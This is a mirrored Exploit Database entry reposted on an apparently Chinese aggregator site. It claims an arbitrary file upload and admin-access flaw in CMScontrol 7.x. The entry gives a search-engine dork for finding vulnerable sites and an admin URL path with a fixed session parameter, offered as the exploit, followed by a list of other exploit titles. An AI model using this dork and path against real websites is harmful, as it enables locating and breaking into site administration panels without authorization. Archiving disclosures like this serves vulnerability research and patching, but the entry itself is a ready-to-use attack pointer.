CMScontrol 7.x – Arbitrary File Upload

Exploit Database
11 阅读

作者： Cyber_945

日期： 2010-01-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11104/

#############################################################
#CMScontrol 7.x File Upload #
#############################################################
# Author: Cyber_945
# Home: Ar-ge.Org
# Greetz: D3xer and All Ar-ge.Org Members
# Not3: Ar-ge.Org Online
# Name: CMScontrol 7.x File Upload
# Bug Type: File Upload
# Infection : Adminin bilgileri alinabilir.
# Dork: inurl:"index.php?id_menu="

#############################################################
=======================C=y=b=e=r=_=9=4=5================
<-- bug code start -- >

Exploit : /admin/katalog.php?id_user=1&sesja=ukEyHkczqqU

Server: http://server/admin/katalog.php?id_user=1&sesja=ukEyHkczqqU

=======================C=y=b=e=r=_=9=4=5================

last Exploits
CMScontrol 7.x – Arbitrary File Upload的更多信息

WordPress Plugin DS FAQ 1.3.2 – SQL Injection：
fipsForum 2.6 – Remote Database Disclosure：
WordPress Theme The Gazette Edition 2.9.4 – Multiple Vulnerabilities：
vBulletin 4.x Verify Email Before Registration Plugin – SQL Injection：
Advanced Comment System 1.0 – SQL Injection：
Data Center Audit 2.6.2 – Cross-Site Request Forgery (Update Admin)：
WordPress Plugin Global Content Blocks 2.1.5 – Cross-Site Request Forgery：
Textpattern CMS 4.6.2 – ‘body’ Persistent Cross-Site Scripting：